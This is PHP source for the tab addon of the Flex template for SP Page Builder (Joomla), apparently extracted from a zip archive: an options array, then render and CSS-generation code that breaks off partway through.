                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_COLOR_HOVER'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'hover'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                    ),
                    'icon_color_active' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_COLOR_ACTIVE'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'active'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                    ),
                    'icon_margin' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_MARGIN'),
                        'responsive' => true,
                        'std' => '0px',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'icon_style'),
                        ),
                        'std' => '',
                    ),
                    //Image Style
                    'image_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TAB_IMG_OPTIONS'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'image_style'),
                        ),
                    ),
                    'nav_image_postion' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_ALIGNMENT'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'image_style'),
                        ),
                        'values' => array(
                            'top' => JText::_('COM_SPPAGEBUILDER_GLOBAL_TOP'),
                            'right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
                            'bottom' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BOTTOM'),
                            'left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
                        ),
                        'std' => 'left',
                    ),
                    'image_height' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_JS_SLIDER_ITEM_IMG_HEIGHT'),
                        'responsive' => true,
                        'max' => 200,
                        'std' => array('md'=>30),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'image_style'),
                        ),
                    ),
                    'image_width' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_JS_SLIDER_ITEM_IMG_WIDTH'),
                        'responsive' => true,
                        'max' => 200,
                        'std' => array('md'=>30),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'image_style'),
                        ),
                    ),
                    'image_margin' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN'),
                        'responsive' => true,
                        'std' => '0px',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('nav_style', '=', 'normal'),
                            array('custom_tab_style', '=', 'icon_image'),
                            array('image_or_icon_style', '=', 'image_style'),
                        ),
                        'std' => '',
                    ),
                    //Content Style
                    'content_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_OPTIONS'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_CONTENT_COLOR'),
                        'std' => '#000',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_backround' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_BG'),
                        'std' => '#e5e5e5',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_fontsize' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_CONTENT_FONT_SIZE'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                        'max' => 400,
                        'responsive' => true,
                        'std' => array('md'=>''),
                    ),
                    'content_lineheight'=>array(
                        'type'=>'slider',
                        'title'=>JText::_('COM_SPPAGEBUILDER_TAB_CONTENT_LINEHEIGHT'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                        'responsive' => true,
                        'max'=> 400,
                        'std' => array('md'=>''),
                    ),
                    'content_font_family'=>array(
                        'type'=>'fonts',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONT_FAMILY'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                        'selector'=> array(
                            'type'=>'font',
                            'font'=>'{{ VALUE }}',
                            'css'=>'.sppb-tab-custom-content > div{ font-family: "{{ VALUE }}"; }'
                        )
                    ),
                    'content_font_style'=>array(
                        'type'=>'fontstyle',
                        'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONTSTYLE'),
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_border' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_CONTENT_BORDER'),
                        'std' => 1,
                        'max' => 20,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_border_radius' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_CONTEN_BORDER_RADIUS'),
                        'std' => '',
                        'max' => 400,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_CONTENT_BORDER_COLOR'),
                        'std' => '#e5e5e5',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'show_boxshadow' => array(
                        'type' => 'checkbox',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_BOXSHADOW_SHOW'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_TAB_BOXSHADOW_SHOW_DESC'),
                        'std' => 1,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'shadow_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_BOXSHADOW_COLOR'),
                        'std' => '#000',
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('show_boxshadow', '=', 1),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'shadow_horizontal' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_SHADOW_HORIZONTAL'),
                        'std' => '',
                        'max' => 100,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('show_boxshadow', '=', 1),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'shadow_vertical' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_SHADOW_VERTICAL'),
                        'std' => '',
                        'max' => 100,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('show_boxshadow', '=', 1),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'shadow_blur' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_SHADOW_BLUR'),
                        'std' => '',
                        'max' => 100,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('show_boxshadow', '=', 1),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'shadow_spread' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_SHADOW_SPREAD'),
                        'std' => '',
                        'max' => 100,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('show_boxshadow', '=', 1),
                            array('custom_tab_style', '=', 'content'),
                        ),
                    ),
                    'content_margin' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_MARGIN'),
                        'responsive' => true,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                        'std' => '',
                    ),
                    'content_padding' => array(
                        'type' => 'padding',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_CONTENT_PADDING'),
                        'responsive' => true,
                        'depends' => array(
                            array('style', '=', 'custom'),
                            array('custom_tab_style', '=', 'content'),
                        ),
                        'std' => '10px 10px 10px 10px',
                    ),
                    'class' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
                        'std' => ''
                    ),
                ),
            ),
        )
);
PK!Umo�~�~�&flex/sppagebuilder/addons/tab/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('Restricted access');


class SppagebuilderAddonTab extends SppagebuilderAddons {

	public function render() {
        
        $settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		$style = (isset($settings->style) && $settings->style) ? $settings->style : '';
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$nav_icon_postion = (isset($settings->nav_icon_postion) && $settings->nav_icon_postion) ? $settings->nav_icon_postion : '';
		$nav_image_postion = (isset($settings->nav_image_postion) && $settings->nav_image_postion) ? $settings->nav_image_postion : '';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';
        $nav_text_align = (isset($settings->nav_text_align) && $settings->nav_text_align) ? $settings->nav_text_align : 'sppb-text-left';
        $nav_position = (isset($settings->nav_position) && $settings->nav_position) ? $settings->nav_position : 'nav-left';
		
		// Pixeden icons
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		$fluid_tab_width = (isset($this->addon->settings->fluid_tab_width) && $this->addon->settings->fluid_tab_width) ? ' '.$this->addon->settings->fluid_tab_width : '';
		
		//Flex Style only
		if($style == 'flex') { 
			$flex_style = ' flex';
			$style = 'tabs';
			$class = '';
		} else {
			$flex_style = '';
		}

		//Output
		$output  = '<div class="sppb-addon sppb-addon-tab'. $flex_style .' ' . $class . '">';
		$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
		$output .= '<div class="sppb-addon-content sppb-tab sppb-' . $style . '-tab sppb-tab-'.$nav_position.'">';

		//Tab Title
		$output .='<ul class="sppb-nav sppb-nav-' . $style . $fluid_tab_width .'" role="tablist">';
		foreach ($settings->sp_tab_item as $key => $tab) {
            $icon_top ='';
            $icon_bottom = '';
            $icon_right = '';
            $icon_left = '';
            $icon_block = '';
            //Image
            $image_top = '';
            $image_bottom = '';
            $image_right = '';
            $image_left = '';

            $title = (isset($tab->title) && $tab->title) ? ' '. $tab->title . ' ' : '';
            $subtitle = (isset($tab->subtitle) && $tab->subtitle) ? '<span class="sppb-tab-subtitle">'. $tab->subtitle . '</span>' : '';

            if(isset($tab->image_or_icon) && $tab->image_or_icon == 'image'){
                if($tab->image && $nav_image_postion == 'top'){
                    $image_top = '<img class="sppb-tab-image tab-image-block" src="' . $tab->image . '" alt="'.trim(strip_tags($title)).'"/>';
                } elseif ($tab->image && $nav_image_postion == 'bottom') {
                    $image_bottom = '<img class="sppb-tab-image tab-image-block" src="' . $tab->image . '" alt="'.trim(strip_tags($title)).'"/>';
                } elseif ($tab->image && $nav_image_postion == 'right') {
                    $image_right = '<img class="sppb-tab-image" src="' . $tab->image . '" alt="'.trim(strip_tags($title)).'"/>';
                } else {
                    $image_left = '<img class="sppb-tab-image" src="' . $tab->image . '" alt="'.trim(strip_tags($title)).'"/>';
                }
            } else {
                if(isset($tab->icon) && $tab->icon){
                    $icon_arr = array_filter(explode(' ', $tab->icon));
                    if (count($icon_arr) === 1) {
                        $tab->icon = 'fa ' . $tab->icon;
                    }
                    if($tab->icon && $nav_icon_postion == 'top'){
                        $icon_top = '<span class="sppb-tab-icon tab-icon-block" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->icon . '" aria-hidden="true"></i></span>';
                    } elseif ($tab->icon && $nav_icon_postion == 'bottom') {
                        $icon_bottom = '<span class="sppb-tab-icon tab-icon-block" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->icon . '" aria-hidden="true"></i></span>';
                    } elseif ($tab->icon && $nav_icon_postion == 'right') {
                        $icon_right = '<span class="sppb-tab-icon" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->icon . '" aria-hidden="true"></i></span>';
                    } else {
                        $icon_left = '<span class="sppb-tab-icon" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->icon . '" aria-hidden="true"></i></span>';
                    }
					
                } else {
					
					if(isset($tab->peicon_name) && $tab->peicon_name){
						
						$icon_arr = array_filter(explode(' ', $tab->peicon_name));
						if (count($icon_arr) === 1) {
							$tab->peicon_name = 'pe ' . $tab->peicon_name;
						}
						if($tab->peicon_name && $nav_icon_postion == 'top'){
							$icon_top = '<span class="sppb-tab-icon tab-icon-block" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->peicon_name . '" aria-hidden="true"></i></span>';
						} elseif ($tab->peicon_name && $nav_icon_postion == 'bottom') {
							$icon_bottom = '<span class="sppb-tab-icon tab-icon-block" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->peicon_name . '" aria-hidden="true"></i></span>';
						} elseif ($tab->peicon_name && $nav_icon_postion == 'right') {
							$icon_right = '<span class="sppb-tab-icon" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->peicon_name . '" aria-hidden="true"></i></span>';
						} else {
							$icon_left = '<span class="sppb-tab-icon" aria-label="'.trim(strip_tags($title)).'"><i class="' . $tab->peicon_name . '" aria-hidden="true"></i></span>';
						}
					
					}
					
				}
            }
            if($nav_icon_postion == 'top' || $nav_icon_postion == 'bottom' || $nav_image_postion == 'top' || $nav_image_postion == 'bottom'){
                $icon_block = 'tab-img-or-icon-block-wrap';
            }
            $output .='<li class="'. ( ($key==0) ? "active" : "").'">';
            $output .= '<a data-toggle="sppb-tab" id="sppb-content-'. ($this->addon->id + $key) .'" class="'.($style == 'custom' ? $nav_text_align : '').' '.$icon_block.'" href="#sppb-tab-'. ($this->addon->id + $key) .'" role="tab" aria-controls="sppb-tab-'. ($this->addon->id + $key) .'" aria-selected="'. ( ($key==0) ? "true" : "false").'">'. $image_top . $image_left . $icon_top . $icon_left . $title . $image_right . $image_bottom . $icon_right . $icon_bottom . $subtitle .'</a>';
            $output .='</li>';
		}
		$output .='</ul>';

		//Tab Contnet
		$output .='<div class="sppb-tab-content sppb-tab-' . $style . '-content">';
		foreach ($settings->sp_tab_item as $key => $tab) {
            $output .='<div id="sppb-tab-'. ($this->addon->id + $key) .'" class="sppb-tab-pane sppb-fade'. ( ($key==0) ? " active in" : "").'" role="tabpanel" aria-labelledby="sppb-content-'. ($this->addon->id + $key) .'">' . $tab->content .'</div>';
		}
		$output .='</div>';
		$output .= '</div>';
		$output .= '</div>';

		return $output;

	}

	public function css() {
        $addon_id = '#sppb-addon-' . $this->addon->id;
        $settings = $this->addon->settings;
        $nav_position = (isset($settings->nav_position) && $settings->nav_position) ? $settings->nav_position : 'nav-left';
		$tab_style = (isset($settings->style) && $settings->style) ? $settings->style : '';
        $style = '';
        $style .= (isset($settings->active_tab_color) && $settings->active_tab_color) ? 'color: ' . $settings->active_tab_color . ';': '';
        $style .= (isset($settings->active_tab_border_width) && trim($settings->active_tab_border_width)) ? 'border-width: ' . $settings->active_tab_border_width . ';border-style: solid;': '';
        $style .= (isset($settings->active_tab_border_color) && $settings->active_tab_border_color) ? 'border-color: ' . $settings->active_tab_border_color . ';': '';

        //Font style
		$font_style = '';
		$font_style .= (isset($settings->nav_fontsize) && $settings->nav_fontsize) ? 'font-size: ' . $settings->nav_fontsize . 'px;': '';
		$font_style .= (isset($settings->nav_lineheight) && $settings->nav_lineheight) ? 'line-height: ' . $settings->nav_lineheight . 'px;': '';
        //Font style object
        $nav_font_style = (isset($settings->nav_font_style) && $settings->nav_font_style) ? $settings->nav_font_style : '';
        
        if(isset($nav_font_style->underline) && $nav_font_style->underline){
			$font_style .= 'text-decoration:underline;';
		}
		if(isset($nav_font_style->italic) && $nav_font_style->italic){
			$font_style .= 'font-style:italic;';
		}
		if(isset($nav_font_style->uppercase) && $nav_font_style->uppercase){
			$font_style .= 'text-transform:uppercase;';
		}
		if(isset($nav_font_style->weight) && $nav_font_style->weight){
			$font_style .= 'font-weight:'.$nav_font_style->weight.';';
        }
        $nav_border = (isset($settings->nav_border) && trim($settings->nav_border)) ? $settings->nav_border : '';
        if(strpos($nav_border, 'px')){
            $font_style .= (isset($settings->nav_border) && trim($settings->nav_border)) ? 'border-width: ' . $settings->nav_border . ';border-style:solid;': '';
        } else {
		    $font_style .= (isset($settings->nav_border) && trim($settings->nav_border)) ? 'border: ' . $settings->nav_border . 'px solid;': '';
        }
		$font_style .= (isset($settings->nav_border_color) && $settings->nav_border_color) ? 'border-color: ' . $settings->nav_border_color . ';': '';
		$font_style .= (isset($settings->nav_color) && $settings->nav_color) ? 'color: ' . $settings->nav_color . ';': '';
		$font_style .= (isset($settings->nav_bg_color) && $settings->nav_bg_color) ? 'background-color: ' . $settings->nav_bg_color . ';': '';
		$font_style .= (isset($settings->nav_border_radius) && $settings->nav_border_radius) ? 'border-radius: ' . $settings->nav_border_radius . 'px;': '';
		$font_style .= (isset($settings->nav_padding) && trim($settings->nav_padding)) ? 'padding: ' . $settings->nav_padding . ';': '';
		
        $font_style_sm = (isset($settings->nav_fontsize_sm) && $settings->nav_fontsize_sm) ? 'font-size: ' . $settings->nav_fontsize_sm . 'px;': '';
        $font_style_sm .= (isset($settings->nav_padding_sm) && trim($settings->nav_padding_sm)) ? 'padding: ' . $settings->nav_padding_sm . ';': '';
        $font_style_sm .= (isset($settings->nav_lineheight_sm) && $settings->nav_lineheight_sm) ? 'line-height: ' . $settings->nav_lineheight_sm . 'px;': '';
        
        $font_style_xs = (isset($settings->nav_fontsize_xs) && $settings->nav_fontsize_xs) ? 'font-size: ' . $settings->nav_fontsize_xs . 'px;': '';
        $font_style_xs .= (isset($settings->nav_padding_xs) && trim($settings->nav_padding_xs)) ? 'padding: ' . $settings->nav_padding_xs . ';': '';
        $font_style_xs .= (isset($settings->nav_lineheight_xs) && $settings->nav_lineheight_xs) ? 'line-height: ' . $settings->nav_lineheight_xs . 'px;': '';
        
        //Nav Width
        $nav_width = (isset($settings->nav_width) && $settings->nav_width) ? $settings->nav_width : 30;
        $nav_width_sm = (isset($settings->nav_width_sm) && $settings->nav_width_sm) ? $settings->nav_width_sm : 30;
        $nav_width_xs = (isset($settings->nav_width_xs) && $settings->nav_width_xs) ? $settings->nav_width_xs : 30;
        //Nav Margin
        $nav_margin = (isset($settings->nav_margin) && trim($settings->nav_margin)) ? 'padding: ' . $settings->nav_margin . ';': 'padding: 0px 0px 5px 0px;';
        $nav_margin_sm = (isset($settings->nav_margin_sm) && trim($settings->nav_margin_sm)) ? 'padding: ' . $settings->nav_margin_sm . ';': '';
        $nav_margin_xs = (isset($settings->nav_margin_xs) && trim($settings->nav_margin_xs)) ? 'padding: ' . $settings->nav_margin_xs . ';': '';
        //Nav Gutter
        if($nav_position == 'nav-right'){
            $nav_gutter_right = (isset($settings->nav_gutter) && $settings->nav_gutter) ? 'padding-left: ' . $settings->nav_gutter . 'px;': 'padding-left: 15px;';
            $nav_gutter_right_sm = (isset($settings->nav_gutter_sm) && $settings->nav_gutter_sm) ? 'padding-left: ' . $settings->nav_gutter_sm . 'px;': 'padding-left: 15px;';
            $nav_gutter_right_xs = (isset($settings->nav_gutter_xs) && $settings->nav_gutter_xs) ? 'padding-left: ' . $settings->nav_gutter_xs . 'px;': 'padding-left: 15px;';

            $nav_gutter_left = (isset($settings->nav_gutter) && $settings->nav_gutter) ? 'padding-right: ' . $settings->nav_gutter . 'px;': 'padding-right: 15px;';
            $nav_gutter_left_sm = (isset($settings->nav_gutter_sm) && $settings->nav_gutter_sm) ? 'padding-right: ' . $settings->nav_gutter_sm . 'px;': 'padding-right: 15px;';
            $nav_gutter_left_xs = (isset($settings->nav_gutter_xs) && $settings->nav_gutter_xs) ? 'padding-right: ' . $settings->nav_gutter_xs . 'px;': 'padding-right: 15px;';
        } else {
            $nav_gutter_right = (isset($settings->nav_gutter) && $settings->nav_gutter) ? 'padding-right: ' . $settings->nav_gutter . 'px;': 'padding-right: 15px;';
            $nav_gutter_right_sm = (isset($settings->nav_gutter_sm) && $settings->nav_gutter_sm) ? 'padding-right: ' . $settings->nav_gutter_sm . 'px;': 'padding-right: 15px;';
            $nav_gutter_right_xs = (isset($settings->nav_gutter_xs) && $settings->nav_gutter_xs) ? 'padding-right: ' . $settings->nav_gutter_xs . 'px;': 'padding-right: 15px;';
            
            $nav_gutter_left = (isset($settings->nav_gutter) && $settings->nav_gutter) ? 'padding-left: ' . $settings->nav_gutter . 'px;': 'padding-left: 15px;';
            $nav_gutter_left_sm = (isset($settings->nav_gutter_sm) && $settings->nav_gutter_sm) ? 'padding-left: ' . $settings->nav_gutter_sm . 'px;': 'padding-left: 15px;';
            $nav_gutter_left_xs = (isset($settings->nav_gutter_xs) && $settings->nav_gutter_xs) ? 'padding-left: ' . $settings->nav_gutter_xs . 'px;': 'padding-left: 15px;';
        }
        
        //Content Style
        $content_style = '';
        $content_style .= (isset($settings->content_backround) && $settings->content_backround) ? 'background-color: ' . $settings->content_backround . ';': '';
        $content_style .= (isset($settings->content_border) && $settings->content_border) ? 'border: ' . $settings->content_border . 'px solid;': '';
        $content_style .= (isset($settings->content_color) && $settings->content_color) ? 'color: ' . $settings->content_color . ';': '';
        $content_style .= (isset($settings->content_border_color) && $settings->content_border_color) ? 'border-color: ' . $settings->content_border_color . ';': '';
        $content_style .= (isset($settings->content_border_radius) && $settings->content_border_radius) ? 'border-radius: ' . $settings->content_border_radius . 'px;': '';
        $content_style .= (isset($settings->content_margin) && trim($settings->content_margin)) ? 'margin: ' . $settings->content_margin . ';': '';
        $content_style .= (isset($settings->content_padding) && trim($settings->content_padding)) ? 'padding: ' . $settings->content_padding . ';': '';
        $content_style .= (isset($settings->content_fontsize) && $settings->content_fontsize) ? 'font-size: ' . $settings->content_fontsize . 'px;': '';
        $content_style .= (isset($settings->content_lineheight) && $settings->content_lineheight) ? 'line-height: ' . $settings->content_lineheight . 'px;': '';
        //Font style object
        $content_font_style = (isset($settings->content_font_style) && $settings->content_font_style) ?  $settings->content_font_style : '';
        if(isset($content_font_style->underline) && $content_font_style->underline){
			$content_style .= 'text-decoration:underline;';
		}
		if(isset($content_font_style->italic) && $content_font_style->italic){
			$content_style .= 'font-style:italic;';
		}
		if(isset($content_font_style->uppercase) && $content_font_style->uppercase){
			$content_style .= 'text-transform:uppercase;';
		}
		if(isset($content_font_style->weight) && $content_font_style->weight){
			$content_style .= 'font-weight:'.$content_font_style->weight.';';
		}
        //Content tablet style
        $content_style_sm = (isset($settings->content_margin_sm) && trim($settings->content_margin_sm)) ? 'margin: ' . $settings->content_margin_sm . ';': '';
        $content_style_sm .= (isset($settings->content_padding_sm) && $settings->content_padding_sm) ? 'padding: ' . $settings->content_padding_sm . ';': '';
        $content_style_sm .= (isset($settings->content_fontsize_sm) && $settings->content_fontsize_sm) ? 'font-size: ' . $settings->content_fontsize_sm . 'px;': '';
        $content_style_sm .= (isset($settings->content_lineheight_sm) && $settings->content_lineheight_sm) ? 'line-height: ' . $settings->content_lineheight_sm . 'px;': '';
        
        //Content Mobile style
        $content_style_xs = (isset($settings->content_margin_xs) && trim($settings->content_margin_xs)) ? 'margin: ' . $settings->content_margin_xs . ';': '';
        $content_style_xs .= (isset($settings->content_padding_xs) && $settings->content_padding_xs) ? 'padding: ' . $settings->content_padding_xs . ';': '';
        $content_style_xs .= (isset($settings->content_fontsize_xs) && $settings->content_fontsize_xs) ? 'font-size: ' . $settings->content_fontsize_xs . 'px;': '';
        $content_style_xs .= (isset($settings->content_lineheight_xs) && $settings->content_lineheight_xs) ? 'line-height: ' . $settings->content_lineheight_xs . 'px;': '';
        //Box shadow
        $show_boxshadow = (isset($settings->show_boxshadow) && $settings->show_boxshadow) ?  $settings->show_boxshadow : '';
        $box_shadow = '';
        if($show_boxshadow){
            $box_shadow .= (isset($settings->shadow_horizontal) && $settings->shadow_horizontal) ?  $settings->shadow_horizontal . 'px ' : '0 ';
            $box_shadow .= (isset($settings->shadow_vertical) && $settings->shadow_vertical) ?  $settings->shadow_vertical . 'px ' : '0 ';
            $box_shadow .= (isset($settings->shadow_blur) && $settings->shadow_blur) ?  $settings->shadow_blur . 'px ' : '0 ';
            $box_shadow .= (isset($settings->shadow_spread) && $settings->shadow_spread) ?  $settings->shadow_spread . 'px ' : '0 ';
            $box_shadow .= (isset($settings->shadow_color) && $settings->shadow_color) ?  $settings->shadow_color : 'rgba(0, 0, 0, .5)';
        }
        //Icon Style
        $icon_style = '';
        $icon_style .= (isset($settings->icon_fontsize) && $settings->icon_fontsize) ?  'font-size: ' . $settings->icon_fontsize .'px;' : '';
        $icon_style .= (isset($settings->icon_margin) && trim($settings->icon_margin)) ?  'margin: ' . $settings->icon_margin . ';' : '';
        $icon_style .= (isset($settings->icon_color) && $settings->icon_color) ?  'color: ' . $settings->icon_color . ';' : '';
        
        $icon_style_sm = (isset($settings->icon_fontsize_sm) && $settings->icon_fontsize_sm) ?  'font-size: ' . $settings->icon_fontsize_sm .'px;' : '';
        $icon_style_sm .= (isset($settings->icon_margin_sm) && trim($settings->icon_margin_sm)) ?  'margin: ' . $settings->icon_margin_sm . ';' : '';
        
        $icon_style_xs = (isset($settings->icon_fontsize_xs) && $settings->icon_fontsize_xs) ?  'font-size: ' . $settings->icon_fontsize_xs .'px;' : '';
        $icon_style_xs .= (isset($settings->icon_margin_xs) && trim($settings->icon_margin_xs)) ?  'margin: ' . $settings->icon_margin_xs . ';' : '';

        //Image Style
        $image_style = '';
        $image_style .= (isset($settings->image_height) && $settings->image_height) ?  'height: ' . $settings->image_height .'px;' : '';
        $image_style .= (isset($settings->image_width) && $settings->image_width) ?  'width: ' . $settings->image_width .'px;' : '';
        $image_style .= (isset($settings->image_margin) && trim($settings->image_margin)) ?  'margin: ' . $settings->image_margin . ';' : '';
        
        $image_style_sm = '';
        $image_style_sm .= (isset($settings->image_height_sm) && $settings->image_height_sm) ?  'height: ' . $settings->image_height_sm .'px;' : '';
        $image_style_sm .= (isset($settings->image_width_sm) && $settings->image_width_sm) ?  'width: ' . $settings->image_width_sm .'px;' : '';
        $image_style_sm .= (isset($settings->image_margin_sm) && trim($settings->image_margin_sm)) ?  'margin: ' . $settings->image_margin_sm . ';' : '';
        
        $image_style_xs = '';
        $image_style_xs .= (isset($settings->image_height_xs) && $settings->image_height_xs) ?  'height: ' . $settings->image_height_xs .'px;' : '';
        $image_style_xs .= (isset($settings->image_width_xs) && $settings->image_width_xs) ?  'width: ' . $settings->image_width_xs .'px;' : '';
        $image_style_xs .= (isset($settings->image_margin_xs) && trim($settings->image_margin_xs)) ?  'margin: ' . $settings->image_margin_xs . ';' : '';

        //Css output            
		$css = '';
		if($tab_style == 'pills') {
            $style .= (isset($settings->active_tab_bg) && $settings->active_tab_bg) ? 'background-color: ' . $settings->active_tab_bg . ';': '';
            if($style) {
                $css .= $addon_id . ' .sppb-nav-pills > li.active > a,' . $addon_id . ' .sppb-nav-pills > li.active > a:hover,' . $addon_id . ' .sppb-nav-pills > li.active > a:focus {';
                $css .= $style;
                $css .= '}';
            }
		} else if ($tab_style == 'lines') {
            $style .= (isset($settings->active_tab_bg) && $settings->active_tab_bg) ? 'border-bottom-color: ' . $settings->active_tab_bg . ';': '';
            if($style) {
                $css .= $addon_id . ' .sppb-nav-lines > li.active > a,' . $addon_id . ' .sppb-nav-lines > li.active > a:hover,' . $addon_id . ' .sppb-nav-lines > li.active > a:focus {';
                $css .= $style;
                $css .= '}';
            }
		} else if ($tab_style == 'custom') {
            //Active Nav style
            $style .= (isset($settings->active_tab_bg) && $settings->active_tab_bg) ? 'background-color: ' . $settings->active_tab_bg . ';': '';

            if($style) {
                $css .= $addon_id . ' .sppb-nav-custom > li.active > a,' . $addon_id . ' .sppb-nav-custom > li.active > a:hover,' . $addon_id . ' .sppb-nav-custom > li.active > a:focus {';
                $css .= $style;
                $css .= '}';
            }
            $css .= $addon_id . ' .sppb-nav-custom {';
            $css .= 'width: ' . $nav_width . '%;';
            $css .= $nav_gutter_right;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-custom-content {';
            $css .= 'width:'. (100-$nav_width) .'%;';
            $css .= $nav_gutter_left;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-custom-content > div {';
            $css .= $content_style;
            $css .= 'box-shadow:'.$box_shadow.';';
            $css .= '}';
            $css .= $addon_id . ' .sppb-nav-custom a {';
